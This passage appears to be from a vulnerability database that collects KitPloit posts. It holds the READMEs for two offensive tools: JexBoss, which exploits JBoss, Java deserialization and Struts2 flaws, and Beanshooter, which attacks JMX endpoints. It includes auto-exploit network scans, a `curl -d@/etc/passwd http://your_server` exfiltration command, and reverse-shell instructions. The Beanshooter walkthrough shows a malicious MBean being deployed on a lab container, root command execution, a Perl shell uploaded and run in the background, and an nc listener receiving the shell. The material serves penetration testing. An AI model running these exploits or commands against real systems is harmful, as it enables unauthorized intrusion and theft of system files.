http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n**Installation on Windows** \nIf you are using Windows, you can use the [Git Bash](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [Python](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [Git for Windows](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands:\n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n**Features** \nThe tool and [exploits](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\nThe exploitation vectors are: \n\n\n * /admin-console\n * tested and working in JBoss versions 5 and 6\n * /jmx-console\n * tested and working in JBoss versions 4, 5 and 6\n * /web-console/Invoker\n * tested and working in JBoss versions 4, 5 and 6\n * /invoker/JMXInvokerServlet\n * tested and working in JBoss versions 4, 5 and 6\n * Application Deserialization\n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n * Servlet Deserialization\n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link)\n * Apache Struts2 CVE-2017-5638\n * tested in [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications\n * Others\n \n**Videos** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n \n\n\n * Exploiting JBoss Application Server with JexBoss\n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n \n \n**Screenshots** \n\n\n * Simple usage examples:\n \n \n $ python jexboss.py\n\n \n\n\n[![](https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s640/jexboss_4_simple_usage_help.png)](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss:\n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[![](https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s640/jexboss_5_standalone_mode1.png)](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[![](https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s640/jexboss_6_standalone_mode2.png)](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes:\n \n \n $ python jexboss.py -h\n\n * Network scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[![](https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s640/jexboss_7_network_scan_mode.png)](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode:\n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[![](https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s640/jexboss_8_scan_with_auto_exploit_mode.png)](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations:\n\n[![](https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s640/jexboss_9_results_and_recommendations2.png)](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n**Reverse Shell (meterpreter integration)** \nAfter you exploit a JBoss server, you can use the own [jexboss](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[![](https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s640/jexboss_10_jexbossreverse2.jpeg)](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. \n \n**Usage examples** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638)\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [cookies](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode:\n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options:\n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n**[Download JexBoss](<https://github.com/joaomatosf/jexboss>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-12-18T21:12:00", "type": "kitploit", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T16:58:48", "description": "[![](https://1.bp.blogspot.com/-0eeaBnOyz9k/YOhDZkX8dRI/AAAAAAAAjJE/yFbbfffyC10NDagL8yjxgF_lOr1H1A_pwCK4BGAYYCw/w640-h372/beanshooter_3_01-demo-737802.gif)](<https://1.bp.blogspot.com/-0eeaBnOyz9k/YOhDZkX8dRI/AAAAAAAAjJE/yFbbfffyC10NDagL8yjxgF_lOr1H1A_pwCK4BGAYYCw/s1600/beanshooter_3_01-demo-737802.gif>)\n\n \n\n\n_ \n_\n\n_Beanshooter_ is a [command line](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) tool written in _Java_, which helps to identify [common vulnerabilities](<https://www.kitploit.com/search/label/Common%20Vulnerabilities> \"common vulnerabilities\" ) on _JMX_ endpoints. \n\n\n \n\n\n**Introduction**\n\n_JMX_ stands for _Java Management Extensions_ and can be used to monitor and configure the _Java Virtual Machine_ from remote. Applications like _tomcat_ or _JBoss_ are often installed together with a _JMX_ instance, which enables server administrators to monitor and manage the corresponding application.\n\n_JMX_ uses so called _MBeans_ for monitoring and configuration tasks. The _JMX_ agent (sever, port) is basically just an interface, that handles remote connections and supports methods to communicate with the underlying _MBean_ objects. The actual functionality is then implemented in the _MBean_ itself and the _JMX_ agent only relays input and output to the _MBean_ object.\n\nBy default, _JMX_ endpoints support a _MBean_ with name _MLet_. This _MBean_ can be used to deploy new _MBeans_ on the _JMX_ agent. The codebase for these new _MBean_ objects can be obtained over the network e.g. in form of a _HTTP_ request. Using the **MLet** feature, attackers with access to a _JMX_ agent can easily deploy their own malicious _MBean_ objects and compromise the underlying application server.\n\n_Beanshooter_ is a _Proof-of-Concept_ tool, that can be used to identify vulnerable endpoints. It works for unauthenticated _JMX_ endpoints as well as for authenticated ones (assumed you have valid credentials and sufficient permissions). Furthermore, it can be used to test other [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) like insecure _Java Deserialization_ or _CVE-2016-3427_. Also connections using the _JMXMP_ protocol are supported.\n\n \n**Installation** \n\n\n_Beanshooter_ is a _Maven_ project. This makes the installation a straight forward process and no manual installation of libraries should be required. First of all, make sure that you have _maven_ installed on your system:\n \n \n $ sudo apt install maven # Debian \n $ pacman -s maven # Arch\n\nThen, clone the _beanshooter_ project in a location of your choice and run `mvn package` inside of the projects folder.\n \n \n [qtc@kali opt]$ git clone https://github.com/qtc-de/beanshooter \n [qtc@kali opt]$ cd beanshooter \n [qtc@kali beanshooter]$ mvn package \n [INFO] Scanning for projects... \n [INFO] \n [INFO] -------------------< de.qtc.Beanshooter:beanshooter >------------------- \n [INFO] Building beanshooter 2.0.0 \n [INFO] --------------------------------[ jar ]--------------------------------- \n [...]\n\nSince the main purpose of _beanshooter_ is the deployment of _MBean_ objects, you need also a corresponding _MBean_. Theoretically you can deploy any _MBean_ that fulfills the _MBean specifications_. However, this project does also provide a reference implementation, the [tonka-bean](<https://github.com/qtc-de/beanshooter/blob/master/tonka-bean> \"tonka-bean\" ). The _tonka-bean_ is a separate _maven_ project and you can compile it in the same way as you compiled _beanshooter_:\n \n \n [qtc@kali beanshooter]$ cd tonka-bean/ \n [qtc@kali tonka-bean]$ mvn package \n [INFO] Scanning for projects... \n [INFO] \n [INFO] --------------------< de.qtc.TonkaBean:tonka-bean >--------------------- \n [INFO] Building tonka-bean 1.0.0 \n [INFO] --------------------------------[ jar ]--------------------------------- \n [INFO] \n [...]\n\nAfter _maven_ has finished, you should find the executable _.jar_ files in the target folders of the corresponding projects. Notice, that _beanshooter_ needs to know where the `tonka-bean.jar` file is located. If you have placed _beanshooter_ inside of your `/opt` folder, this should work automatically. Otherwise, you need to specify the path by using a configuration file or the corresponding command line options.\n \n \n [qtc@kali opt]$ ls -l beanshooter/target/beanshooter.jar \n -rw-r--r-- 1 qtc qtc 314856 Sep 16 07:55 beanshooter/target/beanshooter.jar \n [qtc@kali opt]$ ls -l beanshooter/tonka-bean/target/tonka-bean.jar \n -rw-r--r-- 1 qtc qtc 2624 Sep 16 07:57 beanshooter/tonka-bean/target/tonka-bean.jar\n\n_Beanshooter_ also supports autocompletion for _bash_. To take advantage of autocompletion, you need to have the [completion-helpers](<https://github.com/qtc-de/completion-helpers> \"completion-helpers\" ) project installed. If setup correctly, just copying the [completion script](<https://github.com/qtc-de/beanshooter/blob/master/resources/bash_completion.d/beanshooter> \"completion script\" ) to your `~/.bash_completion.d` folder enables autocompletion.\n \n \n [qtc@kali beanshooter]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/\n\n \n**Usage** \n\n\nFor demonstration purposes, the project contains a [docker image](<https://github.com/qtc-de/beanshooter/packages/398561> \"docker image\" ) of an _Apache Tomcat_ with _JMX_ enabled and listening on port 9010. The corresponding [docker-files](<https://github.com/qtc-de/beanshooter/blob/master/.docker> \"docker-files\" ) can be found inside this repository and should enable you to practice the usage of _beanshooter_ yourself.\n\nThe listing below shows the _nmap_ output for the corresponding container.\n \n \n [qtc@kali]# nmap -p- -sV 172.17.0.2 \n Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 06:51 CEST \n Nmap scan report for 172.17.0.2 \n Host is up (0.0000050s latency). \n Not shown: 65524 closed ports \n PORT STATE SERVICE VERSION \n 5555/tcp open java-object JMXMP Connectors \n 5556/tcp open java-object Java Object Serialization \n 5557/tcp open java-object Java Object Serialization \n 5558/tcp open java-object Java Object Serialization \n 5559/tcp open java-object Java Object Serialization \n 5560/tcp open java-object Java Object Serialization \n 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) \n 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 \n 9010/tcp open ssl/sdr? \n 9011/tcp open ssl/d-star? \n 40213/tcp open java-rmi Java RMI \n \n Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . \n Nmap done: 1 IP address (1 host up) scanned in 20.50 se conds\n\nThis output can be misleading, as _nmap_ is not able to detect the _rmiregistry_ right away. This is because the _rmiregistry_ on this server is configured for _TLS_ usage, which breaks most of the common detection and enumeration tools. However, by looking at the high port that was successfully flagged as _Java RMI_, once can guess that one of the _SSL_ ports has to be the _rmiregistry_. Using [remote-method-guesser](<https://github.com/qtc-de/remote-method-guesser> \"remote-method-guesser\" ) (one of the few tools that support _SSL_ protected registry servers), one can verify that a _JMX agent_ is running:\n \n \n [qtc@kali ~]$ rmg --ssl --classes 172.17.0.2 9010 \n [+] Connecting to RMI registry... done. \n [+] Obtaining a list of bound names... done. \n [+] 1 names are bound to the registry. \n [-] RMI object tries to connect to different remote host: iinsecure.dev \n [-] \tRedirecting the ssl connection back to 172.17.0.2... \n [-] \tThis is done for all further requests. This message is not shown again. \n [+] Listing bound names in registry: \n [+]\t\u00e2\u20ac\u00a2 jmxrmi \n [+]\t --> javax.management.remote.rmi.RMIServerImpl_Stub (known class)\n\nTo verify unauthenticated access, you can use _beanshooter_ with the _status_ action. On an unprotected _JMX endpoint_, the output should look like this:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is not registered on the JMX server. \n [+] Getting Status of malicious Bean... done! \n [+]\tmalicious Bean is not registered on the JMX server.\n\nThe status command shows that neither _MLet_ nor the malicious _MBean_ are registered on the _JMX_ endpoint. You could now either deploy them one by one by using the _deployMLet_ and _deployMBean_ actions, or you can simply use _deployAll_ to deploy both in one step. However, for deploying the malicious _MBean_ the remote server needs to establish a _HTTP_ connection to your listener. Therefore, you might need a firewall [whitelisting](<https://www.kitploit.com/search/label/Whitelisting> \"whitelisting\" ) and you have to use the corresponding `--stager-host` and `--stager-port` options of _beanshooter_ to specify where your listener can be found. Lastly, make sure that the _MBean_ you want to deploy can be found in the path that is specified in your configuration file (default is: `/opt/beanshooter/tonka-bean/target/`). If you use a custom _MBean_, you should also adopt the _beanClass_ and _objectName_ values.\n \n \n [qtc@kali ~]$ beanshooter --ssl --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 9010 deployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... done! \n [+] \n [+] Malicious Bean seems not to be registered on the server \n [+] Starting registration process \n [+] \tCreating HTTP server on 172.17.0.1:8080 \n [+] \t\tCreating MLetHandler for endpoint /mlet... done! \n [+] \t\tCreating JarHandler for endpoint /tonka-bean.jar... done! \n [+]\t\tStarting the HTTP server... done! \n [+] \n [+] \tReceived request for /mlet \n [+] \tSending malicious mlet: \n [+] \n [+] \t\tClass:\t\tde.qtc.tonkabean.TonkaBean \n [+] \t\tArchive:\ttonka-bean.jar \n [+] \t\tObject:\t\tMLetTonkaBean:name=TonkaBean,id=1 \n [+] \t\tCodebase:\thttp://172.17.0.1:8 080 \n [+] \n [+] \tReceived request for /tonka-bean.jar \n [+] \tSending malicious jar file... done! \n [+] \n [+] malicious Bean was successfully registered\n\nNow one can use the _status_ or _ping_ command to verify that the malicious _MBean_ was successfully deployed:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is registered on the JMX server. \n [+] Getting Status of malicious Bean... done! \n [+]\tmalicious Bean is registered on the JMX server. \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 ping \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending ping to the server... done! \n [+] Servers answer is: Pong!\n\nIf you deployed a custom malicious _MBean_, you can now invoke your _MBean_ methods directly from within _jconsole_. While this is also possible for the _tonka-bean_, _beanshooter_ supports actions to interact with the _tonka-bean_ from the command line:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 execute id \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending command 'id' to the server... \n [+] Servers answer is: uid=0(root) gid=0(root) groups=0(root)\n\nYou can also use the _shell_ action, to launch multiple commands as in a (pseudo) command shell. The shell also contains wrappers around the `upload`, `download` and `executeBackground` actions of _beanshooter_:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 shell \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Starting interactive shell... \n \n $ id \n uid=0(root) gid=0(root) groups=0(root) \n $ !upload ~/www/shell.pl /dev/shm/s.pl \n [+] File upload finished. 170 bytes were written to /dev/shm/s.pl \n $ !background perl /dev/shm/s.pl \n Command is executed in the background. \n $ exit \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.17.0.2. \n Ncat: Connection from 172.17.0.2:37522. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\nOnce you are done with your _MBean_, you should make sure to undeploy all changes that you have made to the server. At least you should remove your malicious _MBean_ from the server, but if _MLet_ was not available when you started, you should also remove the _MLet_. _beanshooter_ makes the cleanup pretty easy, by just invoking:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 undeployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Unregister malicious bean... done! \n [+] Unregister MBean 'MLet'... done!\n\nNow the _JMX_ endpoint should be clean again and _MLet_ and the malicious _MBean_ should be removed.\n\n \n**JMXMP Support** \n\n\n_JMXMP_ (_JMX Messaging Protocol_) is just an alternate way (alternate connector) to access a _JMX_ agent and differs in some points from the _Java RMI_ based access as described above. However, for the purpose of this tool, these differences do not really matter. The important thing is that also the _JMXMP_ connector can allow unauthenticated connections and it is also possible to use the _MLet MBean_ over this connector.\n\nThe required classes for the _JMXMP_ connector can be found inside a _.jar_ file called _jmxremote_optional.jar_. Unfortunately, this _.jar_ does not has its own project on _Maven_ anymore (it seems like it was an artifact of the _JMX_ project once, but was removed for some reason). Now, it can be loaded as an artifact of other projects. _beanshooter_ supports the _JMXMP_ protocol by using the _jmxremote-optional_ artifact from _org.glassfish.external_.\n\nIn order to test _JMXMP_ support, the provided [docker-image](<https://github.com/qtc-de/beanshooter/packages/398561> \"docker-image\" ) also opens multiple _JMXMP_ listener on the ports `5555` to `5560`. The following listing shows just the same examples as above, but this time using the _JMXMP_ protocol:\n \n \n [qtc@kali ~]$ beanshooter --jmxmp --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 5555 deployAll \n [+] Connecting to JMX server... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... done! \n [+] MBean 'MLet' did already exist. \n [+] \n [+] Malicious Bean seems not to be registered on the server \n [+] Starting registration process \n [+] \tCreating HTTP server on 172.17.0.1:8080 \n [+] \t\tCreating MLetHandler for endpoint /mlet... done! \n [+] \t\tCreating JarHandler for endpoint /tonka-bean.jar... done! \n [+]\t\tStarting the HTTP server... done! \n [+] \n [+] \tReceived request for /mlet \n [+] \tSending malicious mlet: \n [+] \n [+] \t\tClass:\t\tde.qtc.tonkabean.TonkaBean \n [+] \t\tArchive:\ttonka-bean.jar \n [+] \t\tObject:\t\tMLetTonkaBean:name=TonkaBean,id=1 \n [+] \t\tCodebase:\thttp://172.17.0.1:8080 \n [+] \n [+] \tReceived request for /tonka-bean.jar \n [+] \tSending malicious jar file... d one! \n [+] \n [+] malicious Bean was successfully registered \n [qtc@kali ~]$ beanshooter --jmxmp 172.17.0.2 5555 execute id \n [+] Connecting to JMX server... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending command 'id' to the server... \n [+] Servers answer is: uid=0(root) gid=0(root) groups=0(root)\n\nApart from the plain _JMXMP_ listener on port `5555`, the other _JMXMP_ listeners implement different kind of protections:\n\n * Port `5556` \\- _SSL_ protected _JMXMP_\n * Port `5557` \\- _TLS SASL/PLAIN_ protected _JMXMP_\n * Port `5558` \\- _TLS SASL/CRAM-MD5_ protected _JMXMP_\n * Port `5559` \\- _TLS SASL/DIGEST-MD5_ protected _JMXMP_\n * Port `5560` \\- _TLS SASL/NTLM_ protected _JMXMP_\n\n_Beanshooter_ supports all these types of protections and corresponding examples can be found inside the `README.md` of the [docker-container](<https://github.com/qtc-de/beanshooter/blob/master/.docker> \"docker-container\" ).\n\nUseful tip: It is also possible to use _jconsole_ to connect to a running _JMX_ agent via _JMXMP_. Instead of simply specifying the host and port number for the connection, you have to use the _JMXMP_ service URI `service:jmx:jmxmp://<JMXMPHOST>:<JMXMPPORT>` and you have to make sure that the _jmxremote_optional.jar_ is inside your classpath.\n\n \n**Deserialization Support** \n\n\n[](<https://github.com/qtc-de/beanshooter/blob/master/resources/media/02-deserialization-demo.gif> \"JMX enumeration and attacking tool. \$16\$\" )[![](https://4.bp.blogspot.com/-fVJ4LM15vXo/YOhDb-7uTlI/AAAAAAAAjJM/i8LpAZbEOloigXJYcQZBqQgMf8HVkhP-ACK4BGAYYCw/w640-h372/beanshooter_4_02-deserialization-demo-743568.gif)](<https://4.bp.blogspot.com/-fVJ4LM15vXo/YOhDb-7uTlI/AAAAAAAAjJM/i8LpAZbEOloigXJYcQZBqQgMf8HVkhP-ACK4BGAYYCw/s1600/beanshooter_4_02-deserialization-demo-743568.gif>)\n\nIn case of authenticated _JMX_ endpoints, it is pretty common that usage of _MLet_ does not work, even with valid credentials. The following listing shows an attempt to deploy a malicious _MBean_ on an authenticated _JMX_ endpoint:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.18.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... failed! \n [*] \n [-] The following exception was thrown: java.lang.SecurityException: Authentication failed! Credentials required \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is not registered on the JMX server. \n [+] Getting 